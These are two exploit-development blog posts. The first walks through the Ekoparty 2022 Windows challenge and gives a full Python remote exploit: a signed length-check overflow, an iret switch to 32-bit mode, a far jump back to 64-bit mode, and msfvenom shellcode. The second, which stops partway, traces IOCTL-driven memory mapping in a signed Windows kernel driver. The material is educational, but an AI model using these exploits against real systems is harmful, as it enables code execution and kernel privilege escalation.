Ekoparty 2022 BFS Windows Challenge

By: xct
3 November 2022 at 03:29

In this blog post, we will solve the Windows userland challenge that Blue Frost Security published for Ekoparty 2022. You can find the challenge & description here:

We analyze the bfs-eko2022.exe binary in IDA and can see that it binds to 0.0.0.0 on port 31415. After a client connects, it calls sub_140001160, which checks that the first 6 bytes received are Hello\x00. If that’s the case, it sends back Hi\x00 and proceeds to call sub_140001240, where the main packet parsing is done. At the start of this function, it fills a heap buffer as seen below:

We can see 0x5050505050505050 being written followed by 0xcf58585858585858. This is repeated over the full length of the buffer (0x1000). At the beginning of the main function we can see how this buffer is allocated:

mov     r9d, 40h        ; flProtect
mov     r8d, 3000h      ; flAllocationType
mov     edx, 1000h      ; dwSize
mov     ecx, 10000000h  ; lpAddress
call    cs:VirtualAlloc
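The immediates in this call can be checked against the documented Windows constants. The following is a small sketch for that purpose; the helper name describe_allocation is made up for illustration, while the constant values are the ones documented for VirtualAlloc.

```python
# Constants as documented for the Windows memory API.
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40


def describe_allocation(alloc_type, protect):
    """Return readable names for the flag values passed to VirtualAlloc."""
    names = []
    if alloc_type & MEM_COMMIT:
        names.append("MEM_COMMIT")
    if alloc_type & MEM_RESERVE:
        names.append("MEM_RESERVE")
    if protect == PAGE_EXECUTE_READWRITE:
        names.append("PAGE_EXECUTE_READWRITE")
    return names


# Values taken from the disassembly: r8d = 0x3000, r9d = 0x40.
flags = describe_allocation(0x3000, 0x40)
print(flags)
```

So the region is reserved and committed in one go at a fixed address, and it is executable from the start.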

The buffer that is being filled (we will keep calling it the heap buffer) is located at the fixed address 0x10000000, is readable, writable, and executable (flProtect 0x40 is PAGE_EXECUTE_READWRITE), and has a size of 0x1000. This shows that the initialization fills the complete buffer. The initialization values are suspicious, as you would normally expect null bytes or random data. If we disassemble the bytes we get the following instructions:

0:  50                      push   rax
1:  50                      push   rax
2:  50                      push   rax
3:  50                      push   rax
4:  50                      push   rax
5:  50                      push   rax
6:  50                      push   rax
7:  50                      push   rax
8:  58                      pop    rax
9:  58                      pop    rax
a:  58                      pop    rax
b:  58                      pop    rax
c:  58                      pop    rax
d:  58                      pop    rax
e:  58                      pop    rax
f:  cf                      iretd
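The byte order matters here, because the two constants are stored as little-endian qwords. A quick sketch that packs them the way they end up in memory and labels each byte (the opcode names assume 64-bit mode, which is what the process runs in):

```python
import struct

# The two 64-bit constants stored by the initialization loop.
FILL_A = 0x5050505050505050
FILL_B = 0xCF58585858585858

# x64 stores qwords little-endian, so the lowest byte comes first in memory.
pattern = struct.pack("<QQ", FILL_A, FILL_B)

OPCODES = {0x50: "push rax", 0x58: "pop rax", 0xCF: "iretd"}
layout = [(offset, OPCODES[byte]) for offset, byte in enumerate(pattern)]

for offset, mnemonic in layout:
    print(f"{offset:x}: {mnemonic}")
```

Each 16-byte unit therefore consists of eight pushes, seven pops, and a single iretd as the last byte.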

This does not look random at all and will play a role later on. For now, let’s continue to follow the control flow of the packet parsing function. After the handshake and initialization, it receives more bytes, looking for a magic value 0x323230326F6B45 followed by the byte T which indicates the packet type. It then expects another 4 bytes that represent the packet length.

mov     rax, 323230326F6B45h
cmp     qword ptr [rsp+0F68h+buf], rax
jz      short loc_140001339
|
movzx   eax, [rsp+0F68h+var_20]
mov     [rsp+0F68h+var_38], al
movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 54h ; 'T'
jz      short loc_140001366
|
movsx   eax, [rsp+0F68h+var_1F]
cmp     eax, 0F00h
jle     short loc_140001386

The packet length comparison at the end looks interesting. It’s supposed to make sure that the packet length field cannot be larger than 0xf00. Before the comparison, however, the value is loaded into EAX with movsx, which is a move with sign extension, and the following jle is a signed comparison. This means that if we send 0xffff, it gets extended to 0xffffffff and is interpreted as -1. Since the last jump has to be taken and -1 is lower than 0xf00, we pass the check and can continue!
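The effect of the signed load can be modeled in a few lines. This is only a sketch of the check, assuming the length field is a 16-bit little-endian value as in the 0xffff example; the function names are made up for illustration.

```python
import struct

# The magic qword from the cmp, stored little-endian in the packet.
MAGIC = (0x323230326F6B45).to_bytes(8, "little")
MAX_LEN = 0x0F00


def passes_length_check(raw_len):
    """Model a sign-extending load followed by a signed <= 0xf00 check."""
    (signed_len,) = struct.unpack("<h", raw_len)
    return signed_len <= MAX_LEN


def unsigned_value(raw_len):
    """The same two bytes read as an unsigned length."""
    (value,) = struct.unpack("<H", raw_len)
    return value


print(MAGIC)
print(passes_length_check(b"\xff\xff"), hex(unsigned_value(b"\xff\xff")))
print(passes_length_check(struct.pack("<H", 0x0F01)))
```

The same two bytes pass the signed check as -1 but are far larger than 0xf00 once they are read as an unsigned length.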

Continuing at 140001386 another receive is called, reading network input data into the heap buffer at 0x10000000. The maximum amount of data we can provide here is 0x1000, since anything more than that would go outside the allocated memory and cause an exception. It is then calling sub_1400011B0 on this data.

This function takes the data from the heap and copies it onto the stack, using the length we have provided inside the packet itself! Remember that the intended maximum length is 0xf00 but we were able to provide 0xffff instead. This leads to a stack buffer overflow. The function also filters out 0x2b and 0x33 during the copy operation, replacing them with null bytes on the stack (this will be important later).

After the copy function is finished it will once again check that the packet type is T from the copy of the data that is now on the stack. If that’s the case (which it is if used normally) it will echo back the data it received and exit. By using our stack overflow, we can however overwrite the T on the stack with an X which leads to a win-function:

movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 58h ; 'X'
jnz     short loc_140001474
|
mov     rcx, cs:buf
add     rcx, rax
mov     rax, rcx
mov     cs:off_14000C000, rax
lea     rcx, [rsp+0F68h+CmdLine] ; lpCmdLine
call    cs:off_14000C000

If we can get to this last basic block, the program calls into the heap buffer at the offset right behind our input (0x10000f08 for the 0xf08 bytes sent by the PoC below), which still contains the bytes written during initialization. At this point, we control the stack to some extent and can influence which exact byte of the pre-initialized heap memory we jump to. The following PoC brings us to this point.

PoC_0x01

#!/usr/bin/env python3
import socket, struct
p32 = lambda x: struct.pack('<I', x)

TARGET = '127.0.0.1'
PORT = 31415

sc = b""

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf =  b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion


iret = b""
iret += p32(0x41414141) 	
iret += p32(0x42424242) 			
iret += p32(0x43434343) 	
iret += p32(0x44444444) 	
iret += p32(0x45454545)	

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # land on the pops, skipping the pushes
p.send(buf)
p.recv(1)
p.close() 

When we break on the call instruction we can see that we land on the heap and can single-step until the iret instruction. Note that we chose the input length so that we skip the pushes and land right at the pops, which lets us fully control the stack at the moment iret is executed.

bp bfs_eko2022+0x146E
g
Breakpoint 0 hit
bfs_eko2022+0x146e:
00007ff7`c7f2146e ff158cab0000    call    qword ptr [bfs_eko2022+0xc000 (00007ff7`c7f2c000)] ds:00007ff7`c7f2c000=0000000010000f08
0:000> t
00000000`10000f08 58              pop     rax
0:000> p
00000000`10000f09 58              pop     rax
0:000> 
00000000`10000f0a 58              pop     rax
0:000> 
00000000`10000f0b 58              pop     rax
0:000> 
00000000`10000f0c 58              pop     rax
0:000> 
00000000`10000f0d 58              pop     rax
0:000> 
00000000`10000f0e 58              pop     rax
0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`005eeb50  41414141 42424242 43434343 44444444
00000000`005eeb60  45454545 41414141 41414141 41414141
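The landing spot seen in the trace can be reproduced with a bit of arithmetic. The sketch below assumes that the call target is the buffer base plus the number of data bytes we sent, which matches the 0x10000f08 from the debugger output; the function name is made up for illustration.

```python
BUF_BASE = 0x10000000

# One 16-byte unit of the fill pattern: 8x push, 7x pop, 1x iretd.
PATTERN = bytes([0x50] * 8 + [0x58] * 7 + [0xCF])


def landing(payload_len):
    """Return (call target, pushes executed, pops executed) before the iretd."""
    target = BUF_BASE + payload_len
    pos = payload_len % len(PATTERN)
    executed = []
    while PATTERN[pos] != 0xCF:
        executed.append(PATTERN[pos])
        pos += 1
    return target, executed.count(0x50), executed.count(0x58)


# 0xf00 bytes of frame, shellcode and padding, plus "X", plus 7 "B".
payload_len = 0x0F00 + 1 + 7
target, pushes, pops = landing(payload_len)
print(hex(target), pushes, pops)
```

With a length of 0xf00 we would start at the pushes instead, which would put eight copies of RAX on the stack in front of our data.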

At this point, we have to do some digging on how iret works to see if we can craft the stack in a way that lets us gain (custom) code execution. The iret instruction is used to return control from an exception or interrupt handler and expects the following values on the stack (very good article on this topic):

- new instruction pointer
- new code segment selector (CS)
- new value of EFLAGS register 
- new stack pointer
- new stack segment selector (SS)
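Since the instruction we hit is iretd, each of these five values is a 32-bit dword. A minimal sketch of the frame layout, using the same placeholder values as PoC_0x01 (the helper name is hypothetical):

```python
import struct


def build_iretd_frame(eip, cs, eflags, esp, ss):
    """Pack the five dwords in the order iretd pops them off the stack."""
    return struct.pack("<5I", eip, cs, eflags, esp, ss)


# Placeholder values, easy to recognize in a debugger.
frame = build_iretd_frame(0x41414141, 0x42424242, 0x43434343, 0x44444444, 0x45454545)
print(len(frame), frame)
```

The frame is 20 bytes long, and the instruction pointer is the first dword at the top of the stack.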

As for the instruction pointer and stack pointer, we can just point them into our heap buffer since we control a large part of it. The EFLAGS value we can get from debugging and then reuse. This leaves us with CS and SS, which are a bit tricky. CS and SS hold selectors that index into the Global Descriptor Table (GDT), which has descriptors for kernel code/data and user code/data. Using WinDBG as a kernel debugger we can see which indices match which descriptor:

0: kd> dd @gdtr
fffff807`39e95fb0  00000000 00000000 00000000 00000000
fffff807`39e95fc0  00000000 00209b00 00000000 00409300
fffff807`39e95fd0  0000ffff 00cffb00 0000ffff 00cff300
fffff807`39e95fe0  00000000 0020fb00 00000000 00000000
fffff807`39e95ff0  40000067 39008be9 fffff807 00000000
fffff807`39e96000  00003c00 0040f300 00000000 00000000
fffff807`39e96010  00000000 00000000 00000000 00000000

The first 16 bytes are reserved. Following those, we can see that there are values at offsets 0x10 and 0x18:

0: kd> dg 0x10
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
0: kd> dg 0x18
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P  Nl 00000493

These should be the entries for the kernel. Then we have 2 more values following:

0: kd> dg 0x20
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P  Nl 00000cfb
0: kd> dg 0x28
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P  Nl 00000cf3

These are the user code and stack descriptors ranging from 0 to 0xffffffff. The 2 least significant bits of the selector value hold the RPL (Requested Privilege Level), or the CPL (Current Privilege Level) once the selector is loaded into CS. Because we are looking to stay in ring 3, we have to set both bits (a value of 3), so 0x20 for the code segment becomes 0x23 and 0x28 becomes 0x2b.
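The relation between selector values and GDT offsets can be made explicit with a small decoder. This follows the standard x86 selector layout (index in bits 3 and up, table indicator in bit 2, RPL in bits 0 and 1); the function name is made up for illustration.

```python
def decode_selector(selector):
    """Split a segment selector into index, table and requested privilege level."""
    return {
        "index": selector >> 3,
        "gdt_offset": (selector >> 3) * 8,
        "table": "LDT" if selector & 0b100 else "GDT",
        "rpl": selector & 0b11,
    }


for value in (0x23, 0x2B, 0x33, 0x53):
    print(hex(value), decode_selector(value))
```

All four selectors that appear in this post point into the GDT with RPL 3; they only differ in the descriptor they pick.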

Segmentation is mostly disabled in 64-bit mode (see: https://nixhacker.com/segmentation-in-intel-64-bit/), but the descriptor that CS refers to still decides whether code runs in 64-bit or 32-bit mode. The descriptor at 0x20 is a 32-bit code segment, so by supplying 0x23 as CS for our iret we will switch to 32-bit mode. With this bit of theory out of the way we still have a problem: 0x2b is a bad byte and will not end up on the stack! So we can choose 0x23 for the code segment but have to be creative about what to use for the stack segment.
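Which mode a code selector leads to can be read directly from the raw GDT entries in the kernel debugger dump above. The sketch below decodes a descriptor from its two dwords, following the standard x86 segment descriptor layout; the function name and the dictionary keys are made up for illustration.

```python
def decode_descriptor(low, high):
    """Decode an 8-byte segment descriptor given as two little-endian dwords."""
    limit = (low & 0xFFFF) | (high & 0x000F0000)
    base = (low >> 16) | ((high & 0xFF) << 16) | (high & 0xFF000000)
    if high & (1 << 23):  # G bit: limit is counted in 4 KiB pages
        limit = (limit << 12) | 0xFFF
    return {
        "base": base,
        "limit": limit,
        "dpl": (high >> 13) & 0b11,
        "code": bool(high & (1 << 11)),
        "long_mode": bool(high & (1 << 21)),      # L bit
        "default_32bit": bool(high & (1 << 22)),  # D/B bit
    }


# Raw dwords copied from the `dd @gdtr` output, keyed by GDT offset.
entries = {
    0x10: (0x00000000, 0x00209B00),
    0x20: (0x0000FFFF, 0x00CFFB00),
    0x30: (0x00000000, 0x0020FB00),
}
for offset, (low, high) in entries.items():
    print(hex(offset), decode_descriptor(low, high))
```

The entry at 0x20 is a ring 3 code segment without the L bit, which is why loading selector 0x23 results in 32-bit execution, while the entry at 0x30 is a ring 3 code segment with the L bit set.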

In theory, any value that does not crash on iret is fine. It has to refer to a Data RW descriptor, but we don’t necessarily need a valid stack base and limit if we can avoid using the stack. After inspecting more values and seeing which ones do and don’t crash, we eventually find 0x53:

0:000> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`0060a000 00000000`00000fff Data RW Ac 3 Bg By P  Nl 000004f3

From the output, we can see that base and limit are not really useful for us but if we avoid the stack we should be fine (base and limit are also somewhat random and can change at reboots). Now it’s time to update the PoC:

PoC_0x02

...
sc =  b""
sc += b"\xcc"
sc += b"\x90"*100
...
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			 
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)
...

Debugging the new PoC shows that we indeed end up in 32-bit mode inside our shellcode and can execute it!

0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`00cfede0  10000014 00000023 00010202 10000400
00000000`00cfedf0  00000053 41414141 41414141 41414141
0:000> g
10000014 cc              int     3
0:000:x86> p
10000015 90              nop
0:000:x86> p
10000016 90              nop

Any attempt to use the stack will however fail (note that WinDBG will automatically repair 0x53 back to 0x2b if you are single-stepping, which can be confusing!). This means we need to find a way to use our ability to execute shellcode to either restore stack functionality or get back to 64-bit mode.

As it turns out, there is exactly such a thing. By using a far jump like 0x33:0x100000xx we can specify 0x33 as the new code segment, which gets us back to 64-bit mode. Since 64-bit mode does not need a stack segment selector, we can now use the stack again! The only thing left to do (besides generating valid shellcode) is to restore the stack pointer. Luckily, debugging shows that RCX still holds a reference to the stack, so we can just copy it into RSP. After executing the jump into 64-bit mode we can continue to execute 64-bit shellcode to restore the stack and then do anything we like:

PoC_0x03

...
sc =  b""
sc += b"\xcc"
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # far jmp at 0x10000015 (x86) to 0x33:0x1000001c (x64)
sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx
sc += b"\xcc"
...

Note that even though 0x33 is a bad byte, this is only true for the stack: on the heap, where the shellcode lies, it remains unchanged. Debugging shows the swap back to 64-bit:

10000014 cc                      int     3
0:000:x86> p
10000015 ea1c0000103300          jmp     0033:1000001C
0:000:x86> p
00000000`1000001c 4889c8          mov     rax,rcx
0:000> p
00000000`1000001f 4889c4          mov     rsp,rax
0:000> 
00000000`10000022 cc              int     3
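The far jump bytes follow the direct `jmp ptr16:32` encoding: opcode EA, then the 32-bit offset, then the 16-bit selector. A short sketch that rebuilds the stub and works out where the 64-bit code has to start (the helper name is hypothetical):

```python
import struct


def encode_far_jmp32(selector, offset):
    """Encode a direct far jump (opcode EA) as used from 32-bit code."""
    return struct.pack("<BIH", 0xEA, offset, selector)


stub = encode_far_jmp32(0x33, 0x1000001C)
print(stub.hex())

# The jump sits right after the int3 at 0x10000014, i.e. at 0x10000015.
jmp_address = 0x10000015
next_instruction = jmp_address + len(stub)
print(hex(next_instruction))
```

The instruction is 7 bytes long, so the jump target has to move along whenever bytes are added or removed in front of it.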

For the final exploit, all that is left to do is generate some shellcode, e.g. msfvenom -p windows/x64/exec cmd="calc" -f python.

Final PoC

#!/usr/bin/env python3
# Author: @xct_de

import socket, struct
p32 = lambda x: struct.pack('<I', x)

TARGET = '127.0.0.1'
PORT = 31415

sc =  b""
#sc += b"\xcc"

sc += b"\xea\x1b\x00\x00\x10\x33\x00" # far jmp at 0x10000014 (x86) to 0x33:0x1000001b (x64); one byte lower than in PoC_0x03 because the leading int3 is gone
sc += b"\x48\x89\xC8\x48\x89\xC4"     # restore original stack from rcx

# msfvenom -p windows/x64/exec cmd="calc" -f python
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf = b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion

# switch from 64-bit to 32-bit via iret
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			  
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)			    

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # land on the pops, skipping the pushes
p.send(buf)
p.recv(1)
p.close() 

The post Ekoparty 2022 BFS Windows Challenge appeared first on Vulndev.

Windows Kernel Exploitation – Arbitrary Memory Mapping (x64)

By: xct
24 September 2022 at 11:09

In this post, we will develop an exploit for the HW driver. I picked this one because I was looking for a real-life target to practice on and saw a post by Avast that mentioned vulnerabilities in an old version of this driver (version 4.8.2 from 2015), which was used as part of a bigger exploit chain. Unfortunately, I could not find that version available for download, so I ended up using the most recent version, 4.9.8 at the time of writing this post. This driver is signed by Microsoft, so we can load it even without a kernel debugger attached (the certificate expired in 2021, but that does not really prevent loading).

Advisory: https://ssd-disclosure.com/ssd-advisory-mts-hw-driver-escalation-of-privileges/

I started by trying to find the IOCTLs mentioned in the post, but they do not exist anymore. Luckily, the driver provides some other IOCTLs that look relatively easy to exploit, so I gave it a shot.

Vulnerability Discovery

Before starting to look at the driver in IDA, I gave this excellent intro post by Voidsec another read to see what kind of starting points to look for:

  • MmMapIoSpace
  • rdmsr
  • wrmsr

At the end of the post, he mentions looking for MmMapIoSpace as an exercise, which is something that we have in this driver as well. In the end, I used a different function though.

After opening the driver in IDA, we look at the imports and can see a couple of functions that handle memory mappings:

Besides the already mentioned MmMapIoSpace there are a couple of other interesting functions here that we can potentially use, including MmMapLockedPages. Let’s see what both functions do:

PVOID MmMapIoSpace(
  [in] PHYSICAL_ADDRESS    PhysicalAddress,
  [in] SIZE_T              NumberOfBytes,
  [in] MEMORY_CACHING_TYPE CacheType
);

MmMapIoSpace allows mapping a physical memory address to a virtual (kernel-mode) address. This can be useful if you can control the arguments to the function, especially the first 2, through some IOCTL. In this driver, this is indeed the case with one of the IOCTLs, but the memory is never mapped to a user-mode address afterward or returned, so I could not do much with it besides crashing the system (by mapping an invalid address). If this address were mapped to a user-mode address and returned, it could be exploited. There is an excellent post here on how to do it. Let’s look at the other function for now:

PVOID MmMapLockedPages(
  [in] PMDL MemoryDescriptorList,
  [in] __drv_strictType(KPROCESSOR_MODE / enum _MODE,__drv_typeConst)KPROCESSOR_MODE AccessMode
);

This function (which is deprecated according to Microsoft) allows mapping a virtual address to another one and takes in a pointer to a Memory Descriptor List (MDL). Usually, a call to this function is preceded by the following calls:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,
  [in]                ULONG                  Length,
  [in]                BOOLEAN                SecondaryBuffer,
  [in]                BOOLEAN                ChargeQuota,
  [in, out, optional] PIRP                   Irp
);

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList
);

IoAllocateMdl takes a virtual memory address & length (we ignore the other arguments for now) and will result in an MDL that is large enough to map our requested buffer size (but not filled yet). The following MmBuildMdlForNonPagedPool will then update the structure with the information about the underlying physical pages that back the virtual memory we requested. Finally, MmMapLockedPages takes the pointer to the MDL and returns another address in user-mode virtual memory to which the physical pages described by the MDL have been mapped.

This essentially means that if the 3 functions are executed in the order described, we create a second virtual address that maps to the same physical address as the initial virtual address.
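The idea of two virtual addresses backed by the same memory can be tried out in user mode as well. The following is only an analogy and has nothing to do with MDLs: it maps the same temporary file twice with Python’s mmap module and shows that a write through one view is visible through the other.

```python
import mmap
import tempfile

PAGE = 4096

with tempfile.TemporaryFile() as backing:
    # One page of backing storage shared by both views.
    backing.write(b"\x00" * PAGE)
    backing.flush()

    view_a = mmap.mmap(backing.fileno(), PAGE)
    view_b = mmap.mmap(backing.fileno(), PAGE)

    # Write through the first mapping, read through the second one.
    view_a[0:5] = b"hello"
    seen_through_b = bytes(view_b[0:5])
    print(seen_through_b)

    view_a.close()
    view_b.close()
```

In the driver case the first view is a kernel address of our choosing and the second one is a user-mode address handed back to us, which is what makes the primitive interesting.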

With this theory out of the way, let’s see if and how we can reach this chain of functions. By following the references in IDA we can see that it’s used a few times throughout the program but only in 2 functions:

The path we are going to follow is sub_2E80 (also worth exploring the other one though). When we look at this function we first see a couple of checks being done on the arguments before it eventually ends up in the sequence of functions we just discussed:

For the checks inside the function, we will have a look in the debugger later since some of them might just not matter much to us (e.g. some might be automatically passed without any work from our side). For now, we focus on discovering how to reach this function in the first place. We look for references again and find quite a few:

All those refs are coming from the same function which is essentially a big switch/if/else construct for the different IOCTLs that this driver supports. Here we just go for the first one and follow the back-edges in IDA until we hit an IOCTL at 0x3F70:

cmp     [rsp+0D8h+var_24], 9C406500h
jz      loc_52D8
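An IOCTL value like this one can be split into the fields of the CTL_CODE macro (device type, required access, function number, transfer method). A small decoder as a sketch; the function name is made up, the bit layout is the documented one.

```python
def decode_ioctl(code):
    """Split a 32-bit I/O control code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


fields = decode_ioctl(0x9C406500)
print({name: hex(value) for name, value in fields.items()})
```

Method 0 is METHOD_BUFFERED, which means the I/O manager hands the driver a kernel-mode copy of our input buffer rather than the user-mode pointer itself.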

So with a potential IOCTL that can get close to the code path we want, we quickly check the driver start function, which calls sub_1E80 and contains the device name string we need in order to get a handle to the driver via CreateFile.

Now we can write our first template and debug the driver:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

int main() {
    DWORD index = 0;
    DWORD bytesWritten = 0;

    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %lu\n", GetLastError());
        exit(1);
    }    
   
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434344444444; 
    *(in + index++) = 0x4545454546464646;              

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);

    return 0;
}

Before running the program, we set a breakpoint on the IOCTL comparison so we can follow the execution flow in the debugger:

0: kd> .reload
0: kd> lm m hw64
Browse full module list
start             end                 module name
fffff806`5c1a0000 fffff806`5c1aa000   hw64       (deferred)
0: kd> ba e1 hw64+0x3F70
0: kd> g
...
Breakpoint 0 hit
hw64+0x3f70:
fffff806`5c1a3f70 81bc24b40000000065409c cmp dword ptr [rsp+0B4h],9C406500h

Now that we hit the breakpoint, we continue to step through the code and inspect the source of every comparison to make sure that we track any dependencies on our input buffer. After a few instructions, we hit a call to our target function at hw64+0x532b:

1: kd> 
hw64+0x532b:
fffff806`5c1a532b e850dbffff      call    hw64+0x2e80 (fffff806`5c1a2e80)
1: kd> r
rax=000000009c406500 rbx=ffffbb08113f9540 rcx=ffffbb080fc63000
rdx=0000000000000000 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a532b rsp=ffffcb0d5189e700 rbp=ffffcb0d5189e881
 r8=ffffbb080e9c26c0  
1: kd> dq rcx
ffffbb08`0fc63000  41414141`42424242 43434343`44444444
ffffbb08`0fc63010  45454545`46464646 00000000`00000000
1: kd> t

We can see that this function takes our input buffer as the first argument – more precisely a copy of it since we can see that it’s at a kernel address. We step into the function and look for comparisons again.

1: kd> 
hw64+0x2ef0:
fffff806`5c1a2ef0 488b8424e0000000 mov     rax,qword ptr [rsp+0E0h]
1: kd> 
hw64+0x2ef8:
fffff806`5c1a2ef8 4883781000      cmp     qword ptr [rax+10h],0
1: kd> dq rax+10
ffffbb08`0fc63010  45454545`46464646 

Part of our input is compared to zero – if we trace the instructions in IDA we can see that in order to get to our vulnerable code block we need to not take the jump. So this is fine for now. In the next basic block the same comparison is done again and we also pass the check. This is repeated once more and we finally get to the block at hw64+0x2F60 that has the call to IoAllocateMdl.

1: kd> 
hw64+0x2f7f:
fffff806`5c1a2f7f ff155b410000    call    qword ptr [hw64+0x70e0 (fffff806`5c1a70e0)]
1: kd> r
rax=ffffbb080fc63000 rbx=ffffbb08113f9540 rcx=4545454546464646
rdx=0000000044444444 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a2f7f rsp=ffffcb0d5189e620 rbp=ffffcb0d5189e881
 r8=0000000000000000  r9=0000000000000000

Let’s match the arguments to the function signature:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,  // 4545454546464646
  [in]                ULONG                  Length,          // 0000000044444444 
  [in]                BOOLEAN                SecondaryBuffer, // 0
  [in]                BOOLEAN                ChargeQuota,     // 0
  [in, out, optional] PIRP                   Irp              // 0 (on stack)
);

We can see that we control both the VirtualAddress it’s getting an MDL for and the Length. The values we provided are obviously useless, but they helped us trace our user input. The function doesn’t complain and we can step over it (since it only allocates the memory for the MDL). If we step further we hit MmBuildMdlForNonPagedPool:

1: kd> 
hw64+0x2f97:
fffff806`5c1a2f97 ff153b410000    call    qword ptr [hw64+0x70d8 (fffff806`5c1a70d8)]
1: kd> r
rax=ffffbb080d010000 rbx=ffffbb08113f9540 rcx=ffffbb080d010000

Which maps to this call:

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList // ffffbb080d010000
);

This will now result in a BSOD since the size we requested is way too large and the address is bogus.

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffa9a2a2a32320, memory referenced.

